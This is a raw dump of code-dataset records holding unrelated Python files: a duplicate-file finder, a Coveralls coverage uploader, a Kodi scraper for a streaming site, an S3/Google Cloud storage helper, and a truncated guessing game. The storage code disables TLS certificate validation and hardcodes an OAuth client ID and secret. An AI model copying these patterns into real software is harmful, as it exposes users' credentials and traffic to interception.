The name could differ, but the content is identical')\n\t\tprint('___________________')\n\t\tfor result in results:\n\t\t\tfor subresult in result:\n\t\t\t\tprint('\\t%s' % subresult)\n\t\t\tprint('___________________')\n\n\telse:\n\t\tprint('No duplicate files found.')\n\nif __name__ == '__main__':\n\tif len(sys.argv) > 1:\n\t\tdups = {}\n\t\tfolders = sys.argv[1:]\n\t\tfor i in folders:\n\t\t\t# Iterate the folders given\n\t\t\tif os.path.exists(i):\n\t\t\t\t# Find the duplicated files and append them to the dups\n\t\t\t\tjoinDicts(dups, findDup(i))\n\t\t\telse:\n\t\t\t\tprint('{} is not a valid path, please verify'.format(i))\n\t\t\t\tsys.exit()\n\t\tprintResults(dups)\n\telse:\n\t\tprint(\n\t\t\t'Usage:\\t\\tOption #1. python {} folder\\n'\\\n\t\t\t\t.format(os.path.basename(__file__)) + \n\t\t\t'\\t\\tOption #2. python {} folder1 folder2 folder3'\\\n\t\t\t\t.format(os.path.basename(__file__))\n\t\t)","sub_path":"dupFinder.py","file_name":"dupFinder.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"126306204","text":"import argparse\nimport hashlib\nimport json\nimport os\nimport re\n\nfrom glob import glob\nfrom hashlib import md5\nfrom itertools import chain\nfrom multiprocessing import Pool\nfrom sys import argv\nfrom typing import Dict\n\ndef log_error(msg: str):\n print('\\u001b[31merror: {}\\u001b[0m'.format(msg))\n\ndef log_warning(msg: str):\n print('\\u001b[93mwarning: {}\\u001b[0m'.format(msg))\n\ndef log_info(msg: str):\n print('\\u001b[94minfo: {}\\u001b[0m'.format(msg))\n\nclass LlvmCoverageClass():\n \"\"\"An invidual class within a coverage report.\n \n Arguments:\n project_source_files: [str]: an array of source file paths\n source: str: actual source of the file being covered\n \"\"\"\n def __init__(self, project_source_files: [str], source: str):\n self.project_source_files = project_source_files\n self.source = source\n self.line_coverage_data 
= list(\n map(self.__coverage_for_line,\n source.splitlines()))\n\n @property\n def is_path_on_first_line(self) -> bool:\n \"\"\"Whether or not the path of the file is included in the report.\n\n Llvm coverage reports contain a filepath on the first line\n of the class being tested if and only if multiple classes\n are being tested, otherwise, we have to find the correct\n file.\n\n Returns:\n bool: True if filepath is included in report, False if not\n \"\"\"\n path = self.source.split(\"\\n\")[0].replace(\":\", \"\")\n return path.lstrip().startswith(\"1|\") is False\n\n @property\n def raw_source(self) -> str:\n \"\"\"Return a report stripped of all coverage artifacts.\n\n Class reports contain a prefix with the line number,\n followed by the coverage number. We need the raw\n source to compare the checksum to the original file.\n\n Returns:\n str: The raw source of the covered file.\n \"\"\"\n return '\\n'.join(list(\n map(lambda line: line.split('|')[-1],\n self.source.splitlines())))\n\n @property\n def source_file_path(self) -> bytes:\n \"\"\"Find the filepath for the file tests from the report.\n \n See #is_path_on_first_line for more details.\n\n Returns:\n bytes: filepath for the source file\n \"\"\"\n if self.is_path_on_first_line:\n return self.source.split(\"\\n\")[0].replace(\":\", \"\").encode('utf-8')\n else:\n # if llvm-cov was run with just one matching source file\n # it doesn't print the source path in this case,.\n # we have to find it ourselves.\n digest = md5()\n digest.update(self.raw_source.encode('utf-8'))\n our_hex = digest.digest()\n\n for file in self.project_source_files:\n if file is None or file is '':\n continue\n digest = md5()\n digest.update(open(file).read().encode('utf-8'))\n file_hex = digest.digest()\n # compare checksums\n if our_hex == file_hex:\n return os.fsencode(file)\n\n @property\n def payload(self) -> Dict[str, any]:\n \"\"\"Create a new payload to send to coveralls.\n\n The payload is a hash representing a source 
code file and\n its coverage data for a single job.\n\n Returns:\n Dict[str, any]: payload to be sent to coveralls\n \"\"\"\n return {\n 'name': os.path.relpath(self.source_file_path).decode('utf-8'),\n 'source_digest': md5(self.source.encode('utf-8')).hexdigest(),\n 'coverage': self.line_coverage_data\n }\n\n def __coverage_for_line(self, line: str) -> int:\n \"\"\"Parse coverage count for a given line of code.\n \n Each line contains a prefix with the line number\n and coverage count. Fetch the coverage count.\n\n Arguments:\n line: str: line of code to be parsed\n Returns:\n int: coverage count of the line\n \"\"\"\n line = re.sub(\":\", \"|\", line)\n\n match = re.match(r'.*(\\s*)(\\d*)\\|(\\s*)(\\d+)', line)\n if match is not None:\n group = match.group(4)\n\n if match is None or group is None:\n # check for thousands or millions (llvm-cov outputs hit counts as 25.3k or 3.8M)\n did_match = re.match(r'/^(\\s*)(\\d+)\\|(\\s*)(\\d+\\.\\d+)(k|M)\\|/', line)\n\n if did_match is not None:\n group = did_match.group(4)\n units_group = did_match.group(5)\n count = group.strip()\n units = 1000 if units_group == 'k' else 1000000\n int((float(count) * units))\n else:\n return None\n else:\n match = group.strip()\n if re.search(r'[0-9]+', match) is not None:\n return int(match)\n elif re.search(r'#+', match) is not None:\n return 0\n else:\n return None \n\nclass LlvmCoverageReport():\n \"\"\"A full coverage report containing 'n' files covered.\n \n Arguments:\n source_paths: [str]: an array of source file paths\n raw_coverage_data: str: the raw coverage report\n \"\"\"\n def __init__(self, source_paths: [str], raw_coverage_data: str):\n self.source_paths = source_paths\n self.raw_coverage_data = raw_coverage_data\n self.coverage_classes: [LlvmCoverageClass] = []\n # this check determines if the profdata was\n # generated from a single file\n if self.is_path_on_first_line is False:\n self.coverage_classes = [LlvmCoverageClass(source_paths, raw_coverage_data)]\n else:\n 
self.coverage_classes = list(\n map(lambda lines: LlvmCoverageClass(source_paths, lines),\n self.raw_coverage_data.split(\"\\n\\n\")[:-1]))\n\n @property\n def payload(self) -> [Dict[str, any]]:\n \"\"\"Create a new payload to send to coveralls.\n\n The payload is an array of hashes representing the source\n code files and its coverage data for a single job.\n\n Returns:\n Dict[str, any]: payload to be sent to coveralls\n \"\"\"\n return list(map(lambda cov: cov.payload, self.coverage_classes))\n \n @property\n def is_path_on_first_line(self) -> bool:\n \"\"\"Whether or not the path of the file is included in the report.\n\n Llvm coverage reports contain a filepath on the first line\n of the class being tested if and only if multiple classes\n are being tested, otherwise, we have to find the correct\n file.\n\n Returns:\n bool: True if filepath is included in report, False if not\n \"\"\"\n path = self.raw_coverage_data.split(\"\\n\")[0].replace(\":\", \"\")\n return path.lstrip().startswith(\"1|\") is False\n\ndef find_file(filename: str, directory: bytes) -> bytes:\n \"\"\"Find a filename recursively within a given directory.\n \n Arguments:\n filename: str: name of the file to be found (without path)\n directory: bytes: top level directory to be searched\n\n Returns:\n bytes: absolute path to file\n \"\"\"\n for root, dirs, filenames in os.walk(directory):\n if os.fsencode(filename) in filenames:\n return os.path.abspath(os.path.join(root, os.fsencode(filename)))\n for dir in dirs:\n find_file(filename, os.path.join(root, dir))\n\ndef map_coverage_files_to_coverage_payloads(file: bytes) -> [Dict[str, any]]:\n \"\"\"Map raw coverage files to their parsed payloads.\n\n Arguments:\n file: bytes: path to coverage file\n\n Returns:\n [Dict[str, any]]: an array containing each parsed coverage class\n \"\"\"\n xcproject_name = os.path.splitext(file)[0]\n log_info('finding file map for {}'.format(xcproject_name))\n filepath = find_file(\n 
'{}-OutputFileMap.json'.format(xcproject_name), \n os.fsencode('{}/Build/Intermediates.noindex'.format(derived_data_dir)))\n if filepath is None:\n filepath = find_file(\n '{}-OutputFileMap.json'.format(xcproject_name), \n os.fsencode('OutputFileMaps'))\n print (\"filepath for {} is: {}\".format(file, filepath))\n source_paths = list(map(\n lambda json: json,\n json.loads(open(filepath).read())))\n log_info('parsing llvm coverage report for {}'.format(xcproject_name))\n return LlvmCoverageReport(\n source_paths, \n open(os.path.join(coverage_data_dir, file)).read()).payload\n\ndef send_payload_to_coveralls(payload_json: str):\n from urllib import request, parse\n url = 'https://coveralls.io/api/v1/jobs'\n req = request.Request(url, data=parse.urlencode({ 'json': payload_json }).encode('utf-8'))\n return request.urlopen(req)\n\n\"\"\"\nFind and parse coverage files into coveralls payload.\nDeliver to coveralls.\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument('-rt',\n '--repo-token',\n help='the repo_token provided for your coveralls repo')\nparser.add_argument('-dd',\n '--derived-data-dir',\n help='the path to your derived data directory')\nparser.add_argument('-cd',\n '--coverage-data-dir',\n help='the directory where coverage data has been generated')\nparser.add_argument('-pr',\n '--pull-request-id',\n help='the associated pull request id of the build')\nparser.add_argument('-b',\n '--build-number',\n help='the number of this build')\nparser.add_argument('-sha',\n '--commit-sha',\n help='the sha of this git commit')\nargs = parser.parse_args()\n\nfrom datetime import datetime\n\nstart = datetime.now()\n\nrepo_token = args.repo_token\ncoverage_data_dir = args.coverage_data_dir\nderived_data_dir = args.derived_data_dir\npull_request_id = args.pull_request_id\nbuild_number = args.build_number\ncommit_sha = args.commit_sha\n\nif repo_token is None:\n log_error(\n 'must provide repo token. 
please see --help for more info')\n exit(1)\nif coverage_data_dir is None:\n coverage_data_dir = './CoverageData'\n log_warning(\n 'coverage data directory not provided. defaulting to ./CoverageData')\nif derived_data_dir is None:\n derived_data_dir = './localDerivedData'\n log_warning(\n 'derived data directory not provided. defaulting to ./localDerivedData')\n\nwith Pool(processes=4) as p:\n coverage_payloads = p.map(\n map_coverage_files_to_coverage_payloads,\n os.listdir(coverage_data_dir))\n\n payload_json = json.dumps({\n 'repo_token': repo_token,\n 'service_name': 'evergreen',\n 'service_number': build_number,\n 'service_pull_request': pull_request_id,\n 'commit_sha': commit_sha,\n 'source_files': list(chain(*coverage_payloads)),\n })\n\n log_info('coveralls response: {}'.format(send_payload_to_coveralls(payload_json).read()))\n end = datetime.now()\n log_info('xccoveralls took {} to run'.format(end - start))\n","sub_path":"scripts/xccoveralls.py","file_name":"xccoveralls.py","file_ext":"py","file_size_in_byte":11068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"226845063","text":"# -*- coding: utf-8 -*-\nfrom resources.lib import logger\nfrom resources.lib.gui.gui import cGui\nfrom resources.lib.gui.guiElement import cGuiElement\nfrom resources.lib.handler.ParameterHandler import ParameterHandler\nfrom resources.lib.handler.requestHandler2 import cRequestHandler\nfrom resources.lib.parser import cParser\n\nSITE_IDENTIFIER = 'xcine_tv'\nSITE_NAME = 'XCine.tv'\nSITE_ICON = 'xcine_tv.png'\nURL_MAIN = 'https://xcine.tv/'\nURL_MOVIES = URL_MAIN + 'filme1?'\nURL_SHOWS = URL_MAIN + 'serien1?'\nURL_SEARCH = URL_MAIN + 'search?key=%s'\n\ndef load():\n\tlogger.info(\"Load %s\" % SITE_NAME)\n\tparams = ParameterHandler()\n\tparams.setParam('sUrl', URL_MOVIES)\n\tcGui().addFolder(cGuiElement('Filme', SITE_IDENTIFIER, 'showMenu'), params)\n\tparams.setParam('sUrl', 
URL_SHOWS)\n\tcGui().addFolder(cGuiElement('Serien', SITE_IDENTIFIER, 'showMenu'), params)\n\tcGui().addFolder(cGuiElement('Suche', SITE_IDENTIFIER, 'showSearch'))\n\tcGui().setEndOfDirectory()\n\ndef showMenu():\n\toGui = cGui()\n\tparams = ParameterHandler()\n\tbaseURL = params.getValue('sUrl')\n\tparams.setParam('sUrl', baseURL + 'sort=top&sort_type=desc')\n\toGui.addFolder(cGuiElement('Update', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=year&sort_type=desc')\n\toGui.addFolder(cGuiElement('Year', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=name&sort_type=desc')\n\toGui.addFolder(cGuiElement('Name', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=imdb_rate&sort_type=desc')\n\toGui.addFolder(cGuiElement('IMDB', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=rate_point&sort_type=desc')\n\toGui.addFolder(cGuiElement('Rate', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=view_total&sort_type=desc')\n\toGui.addFolder(cGuiElement('View', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL)\n\toGui.addFolder(cGuiElement('Genre', SITE_IDENTIFIER, 'showGenre'), params)\n\toGui.setEndOfDirectory()\n\ndef showGenre():\n\tparams = ParameterHandler()\n\tentryUrl = params.getValue('sUrl')\n\tsHtmlContent = cRequestHandler(entryUrl).request()\n\tpattern = 'Genre.*?
    '\n\tisMatch, sContainer = cParser.parseSingleResult(sHtmlContent, pattern)\n\n\tif isMatch:\n\t\tpattern = 'value=\"([^\"]+)\">([^<]+)'\n\t\tisMatch, aResult = cParser.parse(sContainer, pattern)\n\tif not isMatch:\n\t\tcGui().showInfo()\n\t\treturn\n\n\tfor sID, sName in sorted(aResult, key=lambda k: k[1]):\n\t\tparams.setParam('sUrl', entryUrl + 'category=' + sID + '&country=&sort=&key=&sort_type=desc')\n\t\tcGui().addFolder(cGuiElement(sName.strip(), SITE_IDENTIFIER, 'showEntries'), params)\n\tcGui().setEndOfDirectory()\n\ndef showEntries(entryUrl=False, sGui=False, sSearchText=False):\n\toGui = sGui if sGui else cGui()\n\tparams = ParameterHandler()\n\tif not entryUrl: entryUrl = params.getValue('sUrl')\n\tiPage = int(params.getValue('page'))\n\toRequest = cRequestHandler(entryUrl + '&page=' + str(iPage) if iPage > 0 else entryUrl, ignoreErrors=(sGui is not False))\n\toRequest.addHeaderEntry('Referer',URL_MAIN)\n\toRequest.addHeaderEntry('Upgrade-Insecure-Requests', '1')\n\toRequest.addParameters('load','full-page')\n\toRequest.setRequestType(1)\n\tsHtmlContent = oRequest.request()\n\tpattern = '
    [\\s\\S]*?<\\/a>\\s<\\/div>'\n\tisMatch, sContainer = cParser.parseSingleResult(sHtmlContent, pattern)\n\n\tif isMatch:\n\t\tpattern = '(.*?)<\\/b>'\n\t\tisMatch, aResult = cParser.parse(sContainer, pattern)\n\n\tif not isMatch:\n\t\tif not sGui: oGui.showInfo()\n\t\treturn\n\n\tcf = cRequestHandler.createUrl(entryUrl, oRequest)\n\ttotal = len(aResult)\n\tfor sUrl, sThumbnail, sName in aResult:\n\t\tsName = sName.replace(' stream', '')\n\t\tif sSearchText and not cParser().search(sSearchText, sName):\n\t\t\tcontinue\n\t\tsThumbnail = sThumbnail.replace('_thumb', '') + cf\n\t\tisMatch, sYear = cParser.parse(sName, \"(.*?)\\((\\d*)\\)\")\n\t\tfor name, year in sYear:\n\t\t\tsName = name\n\t\t\tsYear = year\n\t\t\tbreak\n\n\t\tisTvshow = True if 'staffel' in sUrl or 'staffel' in sName else False\n\t\tif 'sort=year&sort_type=desc' in entryUrl and not isTvshow:\n\t\t\tsName += ' (' + str(sYear) + ')'\n\t\toGuiElement = cGuiElement(sName, SITE_IDENTIFIER, 'showEpisodes' if isTvshow else 'showAllHosters')\n\t\toGuiElement.setMediaType('tvshow' if isTvshow else 'movie')\n\t\toGuiElement.setThumbnail(sThumbnail)\n\t\toGuiElement.setFanart(sThumbnail)\n\t\tif sYear:\n\t\t\toGuiElement.setYear(sYear)\n\t\tparams.setParam('entryUrl', sUrl)\n\t\tparams.setParam('sName', sName)\n\t\tparams.setParam('sThumbnail', sThumbnail)\n\t\toGui.addFolder(oGuiElement, params, isTvshow, total)\n\tif not sGui:\n\t\tsPageNr = int(params.getValue('page'))\n\t\tif sPageNr == 0:\n\t\t\tsPageNr = 2\n\t\telse:\n\t\t\tsPageNr += 1\n\t\tparams.setParam('page', int(sPageNr))\n\t\tparams.setParam('sUrl', entryUrl)\n\t\toGui.addNextPage(SITE_IDENTIFIER, 'showEntries', params)\n\t\toGui.setView('tvshows' if URL_SHOWS in entryUrl else 'movies')\n\t\toGui.setEndOfDirectory()\n\n\ndef showEpisodes():\n\tparams = ParameterHandler()\n\tsUrl = cParser.urlEncode(params.getValue('entryUrl'),':|/') + '/folge-1'\n\tsThumbnail = params.getValue('sThumbnail')\n\tsHtmlContent = 
cRequestHandler(sUrl).request()\n\tpattern = 'data-episode-id=\"([\\d]+).*?folge.*?([\\d]+)'\n\tisMatch, aResult = cParser.parse(sHtmlContent, pattern)\n\tpattern = 'data-movie-id=\"([\\d]+)'\n\tisMatch, sID = cParser.parse(sHtmlContent, pattern)\n\n\tif not isMatch:\n\t\tcGui().showInfo()\n\t\treturn\n\n\ttotal = len(aResult)\n\tfor eID, eNr in aResult:\n\t\toGuiElement = cGuiElement('Folge ' + eNr , SITE_IDENTIFIER, \"showAllHosters\")\n\t\toGuiElement.setThumbnail(sThumbnail)\n\t\toGuiElement.setFanart(sThumbnail)\n\t\tparams.setParam('eID', eID)\n\t\tparams.setParam('sID', sID[0])\n\t\tcGui().addFolder(oGuiElement, params, False, total)\n\tcGui().setView('episodes')\n\tcGui().setEndOfDirectory()\n\t\ndef showAllHosters():\n\thosters = []\n\teID = ParameterHandler().getValue('eID')\n\tsID = ParameterHandler().getValue('sID')\n\trUrl = ParameterHandler().getValue('entryUrl')\n\tsUrl = cParser.urlEncode(ParameterHandler().getValue('entryUrl'),':|/') + '/deutsch'\n\tif eID == False or sID == False:\n\t\toRequest = cRequestHandler(sUrl)\n\t\toRequest.addHeaderEntry('Origin',URL_MAIN)\n\t\toRequest.addHeaderEntry('Referer',sUrl)\n\t\tsHtmlContent = oRequest.request()\n\t\tpattern = 'data-movie-id=\"(.*?)\"[\\s\\S]*?data-episode-id=\"(.*?)\"'\n\t\tisMatch, aResult = cParser().parse(sHtmlContent, pattern)\n\t\tif isMatch:\n\t\t\tsID = aResult[0][0]\n\t\t\teID = aResult[0][1]\n\n\tfor server in ['0','1','2']:\n\t\ttry:\n\t\t\toRequest = cRequestHandler(URL_MAIN + 'movie/load-stream/' + sID + '/' + eID + '?server=' + server)\n\t\t\toRequest.addHeaderEntry('X-Requested-With', 'XMLHttpRequest')\n\t\t\toRequest.addHeaderEntry('Referer', rUrl)\n\t\t\tsHtmlContentBase = oRequest.request()\n\t\t\ttry:\n\t\t\t\tpattern = 'urlVideo = \"([^\"]+)'\n\t\t\t\tisMatch, hUrl = cParser().parse(sHtmlContentBase, pattern)\n\t\t\t\tif isMatch:\n\t\t\t\t\toRequest = 
cRequestHandler(hUrl[0])\n\t\t\t\t\toRequest.addHeaderEntry('Referer',sUrl)\n\t\t\t\t\toRequest.addHeaderEntry('Origin',URL_MAIN)\n\t\t\t\t\tsHtmlContent = oRequest.request()\n\t\t\t\t\turl = cParser().urlparse(hUrl[0])\n\t\t\t\t\tpattern = 'RESOLUTION=\\d+x([\\d]+)([^#]+)'\n\t\t\t\t\tisMatch, aResult = cParser().parse(sHtmlContent, pattern)\n\t\t\t\t\tif isMatch:\n\t\t\t\t\t\tfor sQualy, sUrl in aResult:\n\t\t\t\t\t\t\thoster = {'link': 'https://' + url + sUrl, 'name':'S' +server+ ' - ' + sQualy}\n\t\t\t\t\t\t\thosters.append(hoster)\n\t\t\texcept:pass\n\t\t\ttry:\n\t\t\t\tpattern = 'var sources = (\\[.*?\\]);'\n\t\t\t\tisMatch, sContainer = cParser.parseSingleResult(sHtmlContentBase, pattern)\n\t\t\t\tif isMatch:\n\t\t\t\t\tpattern = r'\"file\":\"(.+?)\",\"label\":\"(.+?)\",\"type\":\"(.+?)\"'\n\t\t\t\t\tisMatch, aResult = cParser().parse(sContainer, pattern)\n\t\t\t\t\tif isMatch:\n\t\t\t\t\t\tfor sUrl,sQualy,stype in aResult:\n\t\t\t\t\t\t\thoster = {'link': sUrl, 'name':'S' +server+ ' - ' + sQualy}\n\t\t\t\t\t\t\thosters.append(hoster)\n\t\t\texcept:pass\n\t\texcept:pass\n\tif hosters:hosters.append('getHosterUrl')\n\treturn hosters\n\ndef getHosterUrl(sUrl=False):\n\tsUrl = sUrl + '|verifypeer=false&Origin=https%3A%2F%2Fhdfilme.cc%2F&Referer=https%3A%2F%2Fhdfilme.cc%2F'\n\treturn [{'streamUrl': sUrl, 'resolved': True}]\n\ndef showSearch():\n\tsSearchText = cGui().showKeyBoard()\n\tif not sSearchText: return\n\t_search(False, sSearchText)\n\tcGui().setEndOfDirectory()\n\ndef _search(oGui, sSearchText):\n\tshowEntries(URL_SEARCH % cParser().quotePlus(sSearchText), oGui, sSearchText)\n","sub_path":"plugin.video.OTV_MEDIA/resources/sites/xcine_tv.py","file_name":"xcine_tv.py","file_ext":"py","file_size_in_byte":8336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"523076500","text":"import json\nimport mimetypes\nimport os\nimport shutil\nimport StringIO\nimport sys\nimport tempfile\nimport urllib\n\n# s3 
needs boto\nsys.path.append(\"lib/boto.zip\")\nimport boto\nimport boto.s3\nimport boto.s3.connection\n\n# google needs httplib2 and oauth2\n# TODO: Ditch their implementation and roll our own because httplib2 doesn't support\n# streaming file uploads or downloads. Currently we only support what will fit in\n# memory.\nsys.path.append(\"lib/httplib2.zip\")\nsys.path.append(\"lib/oauth2client.zip\")\nsys.path.append(\"lib/\")\nimport httplib2\nimport oauth2client.client\n\nUSER_AGENT = \"python/2.7 (gzip)\"\n\n# NOOP with provider\nclass Withable():\n def __init__(self, obj):\n self.obj = obj\n\n def __enter__(self):\n return self.obj\n\n def __exit__(self, type, value, tb):\n pass\n\ndef getenv(env, keys):\n for k in keys:\n if k in env:\n return env[k]\n # keys can be prefixed with \"APPSOMA_\"\n k = \"APPSOMA_\" + k\n if k in env:\n return env[k]\n return \"\"\n\n# storage provider for local files\nclass LocalProvider:\n def get(self, env, name):\n return open(name, \"rb\")\n\n def put(self, env, name, rdr):\n with open(name, \"wb\") as f:\n shutil.copyfileobj(rdr, f)\n\n# storage provider for azure\nclass AzureBlobStorageProvider:\n def get(self, env, name):\n raise Exception(\"not implemented\")\n\n def put(self, env, name, rdr):\n raise Exception(\"not implemented\")\n\n# storage provider for google (via boto)\nclass GoogleCloudStorageProvider:\n # returns (access key id, secret key)\n def get_legacy(self, env):\n return getenv(env, [\"GS_ACCESS_KEY_ID\"]), getenv(env, [\"GS_SECRET_ACCESS_KEY\"])\n\n # returns (client id, client secret, refresh token)\n def get_oauth(self, env):\n client_id = getenv(env, [\"GS_CLIENT_ID\"]) or \"783971554630-2ujdj92b4n0i7nc81pgjv2udsatktb1m.apps.googleusercontent.com\"\n client_secret = getenv(env, [\"GS_CLIENT_SECRET\"]) or \"6hPHVxn_uvMHeU5knpk62M7A\"\n refresh_token = getenv(env, [\"GS_REFRESH_TOKEN\"])\n return client_id, client_secret, refresh_token\n\n def get_access_token(self, client_id, client_secret, 
refresh_token):\n http = httplib2.Http(disable_ssl_certificate_validation=True)\n res, content = http.request(\"https://www.googleapis.com/oauth2/v3/token\", \"POST\",\n body=\"client_id=\" + client_id +\n \"&client_secret=\" + client_secret +\n \"&refresh_token=\" + refresh_token +\n \"&grant_type=refresh_token\",\n headers={\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\",\n \"User-Agent\": USER_AGENT\n })\n if res.status != 200:\n raise Exception(\"error retrieving access token: \" + res.reason)\n obj = json.loads(content)\n return obj[\"access_token\"]\n\n def get_media(self, access_token, bucket, path):\n http = httplib2.Http(disable_ssl_certificate_validation=True)\n credentials = oauth2client.client.AccessTokenCredentials(access_token, USER_AGENT)\n http = credentials.authorize(http)\n res, contents = http.request(\"https://www.googleapis.com/storage/v1/b/\" + bucket + \"/o/\" + path + \"?alt=media\")\n if res.status != 200:\n raise Exception(\"error retrieving media: \" + res.reason)\n return contents\n\n def put_media(self, access_token, bucket, path, rdr):\n http = httplib2.Http(disable_ssl_certificate_validation=True)\n credentials = oauth2client.client.AccessTokenCredentials(access_token, USER_AGENT)\n http = credentials.authorize(http)\n ct, _ = mimetypes.guess_type(path)\n if not ct:\n ct = \"application/octet-stream\"\n # see https://cloud.google.com/storage/docs/json_api/v1/how-tos/upload#simple\n res, contents = http.request(\n \"https://www.googleapis.com/upload/storage/v1/b/\" + bucket + \"/o\" +\n \"?uploadType=media\" +\n \"&name=\" + urllib.quote(path),\n \"POST\",\n body=rdr.read(),\n headers={\n \"Content-Type\": ct\n })\n if res.status != 200:\n raise Exception(\"error setting media: \" + res.reason)\n return contents\n\n def get_bucket_and_path(self, env, name):\n # gs://...\n if not name.startswith(\"gs://\"):\n raise Exception(\"invalid url: expected gs://\")\n\n # bucket/path...\n parts = 
name[5:].split(\"/\")\n if len(parts) < 2:\n raise Exception(\"invalid url: expected bucket and path\")\n\n return parts.pop(0), \"/\".join(parts)\n\n def get(self, env, name):\n bucket, path = self.get_bucket_and_path(env, name)\n access_key, secret_key = self.get_legacy(env)\n if access_key and secret_key:\n conn = boto.gs.GSConnection(access_key, secret_key)\n key = conn.get_bucket(bucket).get_key(path)\n key.open_read()\n return Withable(key)\n\n client_id, client_secret, refresh_token = self.get_oauth(env)\n if client_id and client_secret and refresh_token:\n access_token = self.get_access_token(client_id, client_secret, refresh_token)\n media = self.get_media(access_token, bucket, path)\n return Withable(StringIO.StringIO(media))\n else:\n raise Exception(\"expected refresh token\")\n\n def put(self, env, name, rdr):\n bucket, path = self.get_bucket_and_path(env, name)\n access_key, secret_key = self.get_legacy(env)\n if access_key and secret_key:\n conn = boto.gs.GSConnection(access_key, secret_key)\n # create a key\n key = boto.s3.key.Key(bucket)\n key.key = path\n # if the rdr has a seek method, we'll assume it's a file\n if hasattr(rdr, \"seek\"):\n key.set_contents_from_file(rdr)\n # otherwise we have to write to a temp file (boto never bothered to\n # implement streaming uploads)\n else:\n with tempfile.SpooledTemporaryFile(100 * 1024) as fd:\n shutil.copyfileobj(rdr, fd)\n fd.seek(0, os.SEEK_SET)\n key.set_contents_from_file(fd)\n return\n\n client_id, client_secret, refresh_token = self.get_oauth(env)\n if client_id and client_secret and refresh_token:\n access_token = self.get_access_token(client_id, client_secret, refresh_token)\n self.put_media(access_token, bucket, path, rdr)\n else:\n raise Exception(\"expected refresh token\")\n\n# storage provider for s3 (via boto)\nclass S3Provider:\n def bucket_and_path(self, env, name):\n # s3://...\n if not name.startswith(\"s3://\"):\n raise Exception(\"invalid url: expected s3://\")\n\n # bucket/path...\n 
parts = name[5:].split(\"/\")\n if len(parts) < 2:\n raise Exception(\"invalid url: expected bucket and path\")\n\n # pull the keys from the environment\n aws_access_key = getenv(env, [\"AWS_ACCESS_KEY\", \"AWS_ACCESS_KEY_ID\"])\n aws_secret_key = getenv(env, [\"AWS_SECRET_KEY\"])\n\n # connect to s3\n conn = boto.s3.connection.S3Connection(aws_access_key, aws_secret_key)\n # get the bucket (the first path entry)\n bucket = conn.get_bucket(parts.pop(0))\n return bucket, \"/\".join(parts)\n\n def get(self, env, name):\n bucket, path = self.bucket_and_path(env, name)\n # get the key\n key = bucket.get_key(path)\n # open it for reading\n key.open_read()\n return Withable(key)\n\n def put(self, env, name, rdr):\n bucket, path = self.bucket_and_path(env, name)\n # create a key\n key = boto.s3.key.Key(bucket)\n key.key = path\n # if the rdr has a seek method, we'll assume it's a file\n if hasattr(rdr, \"seek\"):\n key.set_contents_from_file(rdr)\n # otherwise we have to write to a temp file (boto never bothered to\n # implement streaming uploads)\n else:\n with tempfile.SpooledTemporaryFile(100 * 1024) as fd:\n shutil.copyfileobj(rdr, fd)\n fd.seek(0, os.SEEK_SET)\n key.set_contents_from_file(fd)\n\nproviders = {\n \"azure\": AzureBlobStorageProvider(),\n \"s3\": S3Provider(),\n \"gs\": GoogleCloudStorageProvider(),\n \"file\": LocalProvider()\n}\n\n# Get a reader. Dispatches to the provider using the url scheme (s3://, ...). If\n# no url scheme is provided, local files are assumed.\ndef get(env, name):\n if \"://\" in name:\n scheme = name.split(\"://\")[0]\n if scheme in providers:\n return providers[scheme].get(env, name)\n else:\n raise Exception(\"unknown storage provider: \" + scheme)\n else:\n return providers[\"file\"].get(env, name)\n\n# Read `rdr` and put the contents in `name`. Dispatches to the provider using\n# the url scheme (s3://, gs://, ...). 
If no url scheme is provided, local\n# files are assumed.\ndef put(env, name, rdr):\n if \"://\" in name:\n scheme = name.split(\"://\")[0]\n if scheme in providers:\n return providers[scheme].put(env, name, rdr)\n else:\n raise Exception(\"unknown storage provider: \" + scheme)\n else:\n return providers[\"file\"].put(env, name, rdr)\n","sub_path":"node/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":9440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"570227593","text":"# Crazy Tales\r\n# Create a story based on user input\r\n\r\nfrom tkinter import *\r\n\r\nclass Application(Frame):\r\n\t\"\"\" GUI application that makes little game with user guessing number. \"\"\"\r\n\r\n\r\n\t\r\n\tdef __init__(self, master):\r\n\t\t\"\"\" Initialize Frame. \"\"\"\r\n\t\t# set the initial values\r\n\t\timport random\r\n\t\tself.limit_try = random.randint(5, 9)\r\n\t\tself.the_number = str(random.randint(1, 100))\r\n\t\tself.tries = 0\r\n\t\tself.win = 0\r\n\t\tself.options_pool = [str(list(range(1,101))[i]) for i in list(range(100))]\r\n\t\t\r\n\t\tsuper(Application, self).__init__(master) \r\n\t\tself.grid()\r\n\t\tself.create_widgets()\r\n\t\t\r\n\r\n\t\r\n\tdef create_widgets(self):\r\n\t\t\"\"\" Create widgets to get number and to display prompts. 
